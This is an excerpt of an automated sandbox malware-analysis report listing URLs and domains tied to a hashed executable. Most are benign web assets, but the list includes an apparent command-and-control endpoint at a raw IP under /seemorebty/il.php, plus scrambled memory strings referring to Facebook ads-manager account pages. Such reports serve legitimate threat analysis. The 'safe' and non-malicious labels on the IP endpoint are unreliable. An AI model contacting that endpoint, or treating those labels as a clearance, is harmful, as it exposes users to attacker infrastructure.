https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	URL Reputation	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	0%	URL Reputation	safe
http://crl.pki.goog/GTS1O1core.crl0	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0	0%	URL Reputation	safe
https://pki.goog/repository/0	0%	URL Reputation	safe
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	0%	URL Reputation	safe
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meBoot.min.js	0%	URL Reputation	safe
http://crl.pki.goog/gsr2/gsr2.crl0?	0%	URL Reputation	safe
http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	URL Reputation	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	URL Reputation	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL	0%	URL Reputation	safe
http://crl.pki.goog/GTSGIAG3.crl0	0%	URL Reputation	safe
http://103.136.42.153/seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457.j	0%	Avira URL Cloud	safe
http://103.136.42.153/	0%	Avira URL Cloud	safe
http://103.136.42.153/seemorebty/qx	0%	Avira URL Cloud	safe
http://103.136.42.1537u	0%	Avira URL Cloud	safe
https://www.facetings/account_biisEnterpriseBusibook.com/ads/manis_prepay_accounager/account_setk	0%	Avira URL Cloud	safe
http://103.136.42.1537	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N	0%	Avira URL Cloud	safe
http://103.136.42.153/seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457	0%	Avira URL Cloud	safe
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN	0%	Avira URL Cloud	safe
https://www.facetings/account_biisEnterpriseBusibook.com/ads/manis_prepay_accounager/account_setkern	0%	Avira URL Cloud	safe
http://103.136.42.153/seemorebty/	0%	Avira URL Cloud	safe
http://ctl.136.42.153/	0%	Avira URL Cloud	safe
http://103.136.42.153/seemorebty/il.php?e=	0%	Avira URL Cloud	safe
http://ctlw.fa	0%	Avira URL Cloud	safe
http://103.136.42.153/seemorebty/B	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
star-mini.c10r.facebook.com	185.60.216.35	true	false		high
www.facebook.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://103.136.42.153/seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	d.3.dr	false		high
https://www.google.com/chrome/static/images/folder-applications.svg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/css/main.v2.min.css	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434552345.0000000004359000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.425861993.0000000004177000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.487037473.0000000004148000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.472697671.0000000003FB1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.392029102.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://cvision.media.net/new/286x175/2/75/95/36/612b163a-ff7b-498a-bad2-3c52bbd2c504.jpg?v=9	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350091090.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://103.136.42.153/seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457.j	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408530805.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414426921.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.559956447.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406492322.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406780287.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.467253250.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.446086302.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.469104643.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cvision.media.net/new/286x175/2/57/35/144/83ebc513-f6d1-4e0e-a39a-bef975147e85.jpg?v=9	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://www.msn.com	d.3.dr	false		high
https://deff.nelreports.net/api/report?cat=msn	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314775552.0000000004458000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.530316046.00000000041A1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.317161423.00000000043A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.529232605.0000000004200000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350872397.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350851224.0000000005F69000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.306227745.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350812643.0000000005F89000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314015208.0000000004479000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.434341392.0000000004311000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404281530.0000000004237000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.403560063.0000000004329000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.391643577.000000000438F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.488369799.0000000003FE1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404320020.0000000004238000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/__media__/js/util/nrrV9140.js	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.342452690.00000000054E8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349296329.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.499632698.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/chrome-logo.svg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/homepage_features.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://mem.gfx.ms/me/MeControl/10.19168.0/en-US/meCore.min.js	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/	d.3.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852	d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://103.136.42.153/seemorebty/qx	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.526750231.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://www.msn.com/?ocid=iehp	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.543990852.0000000004277000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.539997483.00000000042E7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.533990328.00000000042E8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.311220175.0000000004320000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.348276655.0000000004380000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.425861993.0000000004177000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.430724978.00000000042D7000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.490972286.0000000004148000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.487037473.0000000004148000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.404223094.0000000004490000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.405024171.0000000004498000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.392029102.00000000042EF000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.388278521.00000000041D0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.380935334.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351258305.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351358120.0000000006061000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351338476.0000000006059000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351426457.0000000006091000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351129238.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351411276.00000000060B1000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
http://103.136.42.153/	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406780287.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.420488675.0000000003E90000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.421222746.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	Avira URL Cloud: safe	unknown
http://103.136.42.1537u	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406492322.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.406780287.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.google.com/chrome/static/images/icon-announcement.svg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351620176.00000000060C9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.facetings/account_biisEnterpriseBusibook.com/ads/manis_prepay_accounager/account_setk	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://103.136.42.1537	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.472522947.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/css/main.v3.min.css	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/application/x-msdownloadC:	d.3.dr	false		high
https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.facetings/account_biisEnterpriseBusibook.com/ads/manis_prepay_accounager/account_setkern	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.575022247.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.288845746.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.319616320.0000000002530000.00000004.00001000.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.567209729.0000000000E8E000.00000002.00000001.01000000.00000003.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/chrome/static/images/download-browser/pixel_phone.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0	d.3.dr	false	URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	d.3.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.317161423.00000000043A8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350872397.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/app-store-download.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.314607366.0000000004328000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.350912944.0000000005F29000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.500233353.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381382844.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://contextual.media.net/	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.430815949.0000000004228000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.538472349.0000000004190000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.484514622.0000000004050000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.396915274.0000000004270000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
https://pki.goog/repository/0	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351442378.00000000060B0000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.534169378.0000000004350000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344677569.0000000004640000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351258305.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.344525230.00000000045C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351574992.00000000043C8000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349448406.00000000045C9000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351358120.0000000006061000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.376499389.0000000004648000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347640015.0000000004647000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349340871.0000000004649000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351338476.0000000006059000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.381221387.0000000006060000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351426457.0000000006091000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347603038.0000000004645000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351521194.0000000006090000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351295568.0000000006031000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.494535680.0000000003F71000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000004.00000003.476014082.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://mem.gfx.ms/meversion?partner=RetailStore2&market=en-us&uhf=1	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.347021081.0000000005568000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.349233494.0000000005569000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false	URL Reputation: safe	unknown
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.351585111.00000000060B9000.00000004.00000800.00020000.00000000.sdmp, d.3.dr	false		high
